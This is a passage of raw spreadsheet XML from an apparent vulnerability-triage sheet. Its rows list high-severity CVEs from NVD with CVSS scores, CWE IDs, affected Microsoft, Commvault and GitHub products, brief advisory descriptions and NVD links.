t="inlineStr"><is><t>CVE-2026-72959</t></is></c><c r="D340" s="5" t="n"><v>8.800000000000001</v></c><c r="E340" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F340" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G340" s="5" t="inlineStr" /><c r="H340" s="5" t="n"><v>0.008999999999999999</v></c><c r="I340" s="5" t="inlineStr" /><c r="J340" s="5" t="inlineStr" /><c r="K340" s="5" t="inlineStr" /><c r="L340" s="5" t="inlineStr" /><c r="M340" s="5" t="inlineStr" /><c r="N340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P340" s="5" t="inlineStr" /><c r="Q340" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R340" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="S340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t></is></c></row><row r="341"><c r="A341" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C341" s="5" t="inlineStr"><is><t>CVE-2026-72960</t></is></c><c r="D341" s="5" t="n"><v>8.800000000000001</v></c><c r="E341" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F341" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G341" s="5" t="inlineStr" /><c r="H341" s="5" t="n"><v>0.008</v></c><c r="I341" s="5" t="inlineStr" /><c r="J341" s="5" t="inlineStr" /><c r="K341" s="5" t="inlineStr" /><c r="L341" s="5" t="inlineStr" /><c r="M341" s="5" t="inlineStr" /><c r="N341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P341" s="5" t="inlineStr" /><c r="Q341" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R341" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t></is></c></row><row r="342"><c r="A342" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C342" s="5" t="inlineStr"><is><t>CVE-2026-72972</t></is></c><c r="D342" s="5" t="n"><v>8.800000000000001</v></c><c r="E342" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F342" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G342" s="5" t="inlineStr" /><c r="H342" s="5" t="n"><v>0.008</v></c><c r="I342" s="5" t="inlineStr" /><c r="J342" s="5" t="inlineStr" /><c r="K342" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L342" s="5" t="inlineStr" /><c r="M342" s="5" t="inlineStr" /><c r="N342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P342" s="5" t="inlineStr" /><c r="Q342" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R342" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t></is></c></row><row r="343"><c r="A343" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C343" s="5" t="inlineStr"><is><t>CVE-2026-72973</t></is></c><c r="D343" s="5" t="n"><v>8.800000000000001</v></c><c r="E343" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F343" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G343" s="5" t="inlineStr" /><c r="H343" s="5" t="n"><v>0.008</v></c><c r="I343" s="5" t="inlineStr" /><c r="J343" s="5" t="inlineStr" /><c r="K343" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L343" s="5" t="inlineStr" /><c r="M343" s="5" t="inlineStr" /><c r="N343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P343" s="5" t="inlineStr" /><c r="Q343" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R343" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t></is></c></row><row r="344"><c r="A344" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C344" s="5" t="inlineStr"><is><t>CVE-2026-72986</t></is></c><c r="D344" s="5" t="n"><v>8.800000000000001</v></c><c r="E344" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F344" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G344" s="5" t="inlineStr" /><c r="H344" s="5" t="n"><v>0.008</v></c><c r="I344" s="5" t="inlineStr" /><c r="J344" s="5" t="inlineStr" /><c r="K344" s="5" t="inlineStr" /><c r="L344" s="5" t="inlineStr" /><c r="M344" s="5" t="inlineStr" /><c r="N344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P344" s="5" t="inlineStr" /><c r="Q344" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R344" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t></is></c></row><row r="345"><c r="A345" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C345" s="5" t="inlineStr"><is><t>CVE-2026-73006</t></is></c><c r="D345" s="5" t="n"><v>8.800000000000001</v></c><c r="E345" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F345" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G345" s="5" t="inlineStr" /><c r="H345" s="5" t="n"><v>0.008</v></c><c r="I345" s="5" t="inlineStr" /><c r="J345" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K34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345" s="5" t="inlineStr" /><c r="M345" s="5" t="inlineStr" /><c r="N345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P345" s="5" t="inlineStr" /><c r="Q345" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R345" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t></is></c></row><row r="346"><c r="A346" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C346" s="5" t="inlineStr"><is><t>CVE-2026-73012</t></is></c><c r="D346" s="5" t="n"><v>8.800000000000001</v></c><c r="E346" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F346" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G346" s="5" t="inlineStr" /><c r="H346" s="5" t="n"><v>0.006</v></c><c r="I346" s="5" t="inlineStr" /><c r="J346" s="5" t="inlineStr" /><c r="K346" s="5" t="inlineStr" /><c r="L346" s="5" t="inlineStr" /><c r="M346" s="5" t="inlineStr" /><c r="N346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P346" s="5" t="inlineStr" /><c r="Q346" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R346" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t></is></c></row><row r="347"><c r="A347" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C347" s="5" t="inlineStr"><is><t>CVE-2026-73013</t></is></c><c r="D347" s="5" t="n"><v>8.800000000000001</v></c><c r="E347" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F347" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G347" s="5" t="inlineStr" /><c r="H347" s="5" t="n"><v>0.006</v></c><c r="I347" s="5" t="inlineStr" /><c r="J347" s="5" t="inlineStr" /><c r="K347" s="5" t="inlineStr" /><c r="L347" s="5" t="inlineStr" /><c r="M347" s="5" t="inlineStr" /><c r="N347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P347" s="5" t="inlineStr" /><c r="Q347" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R347" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t></is></c></row><row r="348"><c r="A348" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C348" s="5" t="inlineStr"><is><t>CVE-2026-73016</t></is></c><c r="D348" s="5" t="n"><v>8.800000000000001</v></c><c r="E348" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F348" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G348" s="5" t="inlineStr" /><c r="H348" s="5" t="n"><v>0.006</v></c><c r="I348" s="5" t="inlineStr" /><c r="J348" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K34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48" s="5" t="inlineStr" /><c r="M348" s="5" t="inlineStr" /><c r="N348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P348" s="5" t="inlineStr" /><c r="Q348" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R348" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t></is></c></row><row r="349"><c r="A349" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C349" s="5" t="inlineStr"><is><t>CVE-2026-73018</t></is></c><c r="D349" s="5" t="n"><v>8.800000000000001</v></c><c r="E349" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F349" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G349" s="5" t="inlineStr" /><c r="H349" s="5" t="n"><v>0.008</v></c><c r="I349" s="5" t="inlineStr" /><c r="J349" s="5" t="inlineStr" /><c r="K349" s="5" t="inlineStr" /><c r="L349" s="5" t="inlineStr" /><c r="M349" s="5" t="inlineStr" /><c r="N349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P349" s="5" t="inlineStr" /><c r="Q349" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R349" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t></is></c></row><row r="350"><c r="A350" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C350" s="5" t="inlineStr"><is><t>CVE-2026-73023</t></is></c><c r="D350" s="5" t="n"><v>8.800000000000001</v></c><c r="E350" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F350" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G350" s="5" t="inlineStr" /><c r="H350" s="5" t="n"><v>0.006</v></c><c r="I350" s="5" t="inlineStr" /><c r="J350" s="5" t="inlineStr" /><c r="K350" s="5" t="inlineStr" /><c r="L350" s="5" t="inlineStr" /><c r="M350" s="5" t="inlineStr" /><c r="N350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P350" s="5" t="inlineStr" /><c r="Q350" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R350" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t></is></c></row><row r="351"><c r="A351" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C351" s="5" t="inlineStr"><is><t>CVE-2026-73028</t></is></c><c r="D351" s="5" t="n"><v>8.800000000000001</v></c><c r="E351" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F351" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G351" s="5" t="inlineStr" /><c r="H351" s="5" t="n"><v>0.005</v></c><c r="I351" s="5" t="inlineStr" /><c r="J351" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K351" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L351" s="5" t="inlineStr" /><c r="M351" s="5" t="inlineStr" /><c r="N351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P351" s="5" t="inlineStr" /><c r="Q351" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R351" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t></is></c></row><row r="352"><c r="A352" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B352" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C352" s="5" t="inlineStr"><is><t>CVE-2026-76647</t></is></c><c r="D352" s="5" t="n"><v>8.800000000000001</v></c><c r="E352" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F352" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G352" s="5" t="inlineStr" /><c r="H352" s="5" t="n"><v>0.004</v></c><c r="I352" s="5" t="inlineStr" /><c r="J352" s="5" t="inlineStr" /><c r="K352" s="5" t="inlineStr" /><c r="L352" s="5" t="inlineStr" /><c r="M352" s="5" t="inlineStr" /><c r="N352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O352" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P352" s="5" t="inlineStr" /><c r="Q352" s="5" t="inlineStr"><is><t>CWE-200, CWE-639, CWE-862</t></is></c><c r="R352" s="5" t="inlineStr"><is><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is></c><c r="S352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76647</t></is></c></row><row r="353"><c r="A353" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B353" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C353" s="5" t="inlineStr"><is><t>CVE-2026-76851</t></is></c><c r="D353" s="5" t="n"><v>8.800000000000001</v></c><c r="E353" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G353" s="5" t="inlineStr" /><c r="H353" s="5" t="n"><v>0.005</v></c><c r="I353" s="5" t="inlineStr" /><c r="J353" s="5" t="inlineStr" /><c r="K353" s="5" t="inlineStr"><is><t>github:enterprise_server</t></is></c><c r="L353" s="5" t="inlineStr" /><c r="M353" s="5" t="inlineStr" /><c r="N353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O353" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P353" s="5" t="inlineStr" /><c r="Q353" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R353" s="5" t="inlineStr"><is><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is></c><c r="S353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76851</t></is></c></row><row r="354"><c r="A354" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C354" s="5" t="inlineStr"><is><t>CVE-2026-77105</t></is></c><c r="D354" s="5" t="n"><v>8.800000000000001</v></c><c r="E354" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G354" s="5" t="inlineStr" /><c r="H354" s="5" t="n"><v>0.002</v></c><c r="I354" s="5" t="inlineStr" /><c r="J354" s="5" t="inlineStr" /><c r="K354" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L354" s="5" t="inlineStr" /><c r="M354" s="5" t="inlineStr" /><c r="N354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P354" s="5" t="inlineStr" /><c r="Q354" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R354" s="5" t="inlineStr"><is><t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t></is></c><c r="S354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t></is></c></row><row r="355"><c r="A355" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C355" s="5" t="inlineStr"><is><t>CVE-2026-77106</t></is></c><c r="D355" s="5" t="n"><v>8.800000000000001</v></c><c r="E355" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G355" s="5" t="inlineStr" /><c r="H355" s="5" t="n"><v>0.003</v></c><c r="I355" s="5" t="inlineStr" /><c r="J355" s="5" t="inlineStr" /><c r="K355" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L355" s="5" t="inlineStr" /><c r="M355" s="5" t="inlineStr" /><c r="N355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P355" s="5" t="inlineStr" /><c r="Q355" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R355" s="5" t="inlineStr"><is><t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t></is></c><c r="S355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t></is></c></row><row r="356"><c r="A356" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C356" s="5" t="inlineStr"><is><t>CVE-2026-77480</t></is></c><c r="D356" s="5" t="n"><v>8.800000000000001</v></c><c r="E356" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F356" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G356" s="5" t="inlineStr" /><c r="H356" s="5" t="n"><v>0.005</v></c><c r="I356" s="5" t="inlineStr" /><c r="J356" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K356" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L356" s="5" t="inlineStr" /><c r="M356" s="5" t="inlineStr" /><c r="N356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P356" s="5" t="inlineStr" /><c r="Q356" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="R356" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t></is></c></row><row r="357"><c r="A357" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C357" s="5" t="inlineStr"><is><t>CVE-2026-77481</t></is></c><c r="D357" s="5" t="n"><v>8.800000000000001</v></c><c r="E357" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F357" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G357" s="5" t="inlineStr" /><c r="H357" s="5" t="n"><v>0.006</v></c><c r="I357" s="5" t="inlineStr" /><c r="J357" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K357" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L357" s="5" t="inlineStr" /><c r="M357" s="5" t="inlineStr" /><c r="N357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P357" s="5" t="inlineStr" /><c r="Q357" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R357" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t></is></c></row><row r="358"><c r="A358" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C358" s="5" t="inlineStr"><is><t>CVE-2026-77482</t></is></c><c r="D358" s="5" t="n"><v>8.800000000000001</v></c><c r="E358" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F358" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G358" s="5" t="inlineStr" /><c r="H358" s="5" t="n"><v>0.008</v></c><c r="I358" s="5" t="inlineStr" /><c r="J358" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K358" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L358" s="5" t="inlineStr" /><c r="M358" s="5" t="inlineStr" /><c r="N358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P358" s="5" t="inlineStr" /><c r="Q358" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R358" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t></is></c></row><row r="359"><c r="A359" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C359" s="5" t="inlineStr"><is><t>CVE-2026-77483</t></is></c><c r="D359" s="5" t="n"><v>8.800000000000001</v></c><c r="E359" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F359" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G359" s="5" t="inlineStr" /><c r="H359" s="5" t="n"><v>0.005</v></c><c r="I359" s="5" t="inlineStr" /><c r="J359" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K359" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L359" s="5" t="inlineStr" /><c r="M359" s="5" t="inlineStr" /><c r="N359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P359" s="5" t="inlineStr" /><c r="Q359" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="R359" s="5" t="inlineStr"><is><t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t></is></c></row><row r="360"><c r="A360" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C360" s="5" t="inlineStr"><is><t>CVE-2026-77484</t></is></c><c r="D360" s="5" t="n"><v>8.800000000000001</v></c><c r="E360" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F360" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G360" s="5" t="inlineStr" /><c r="H360" s="5" t="n"><v>0.011</v></c><c r="I360" s="5" t="inlineStr" /><c r="J360" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K360" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L360" s="5" t="inlineStr" /><c r="M360" s="5" t="inlineStr" /><c r="N360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P360" s="5" t="inlineStr" /><c r="Q360" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R360" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t></is></c></row><row r="361"><c r="A361" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C361" s="5" t="inlineStr"><is><t>CVE-2026-77486</t></is></c><c r="D361" s="5" t="n"><v>8.800000000000001</v></c><c r="E361" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F361" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G361" s="5" t="inlineStr" /><c r="H361" s="5" t="n"><v>0.005</v></c><c r="I361" s="5" t="inlineStr" /><c r="J361" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K361" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L361" s="5" t="inlineStr" /><c r="M361" s="5" t="inlineStr" /><c r="N361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P361" s="5" t="inlineStr" /><c r="Q361" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R361" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t></is></c></row><row r="362"><c r="A362" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C362" s="5" t="inlineStr"><is><t>CVE-2026-77487</t></is></c><c r="D362" s="5" t="n"><v>8.800000000000001</v></c><c r="E362" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F362" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G362" s="5" t="inlineStr" /><c r="H362" s="5" t="n"><v>0.005</v></c><c r="I362" s="5" t="inlineStr" /><c r="J362" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K362" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L362" s="5" t="inlineStr" /><c r="M362" s="5" t="inlineStr" /><c r="N362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P362" s="5" t="inlineStr" /><c r="Q362" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R362" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t></is></c></row><row r="363"><c r="A363" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C363" s="5" t="inlineStr"><is><t>CVE-2026-77495</t></is></c><c r="D363" s="5" t="n"><v>8.800000000000001</v></c><c r="E363" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c 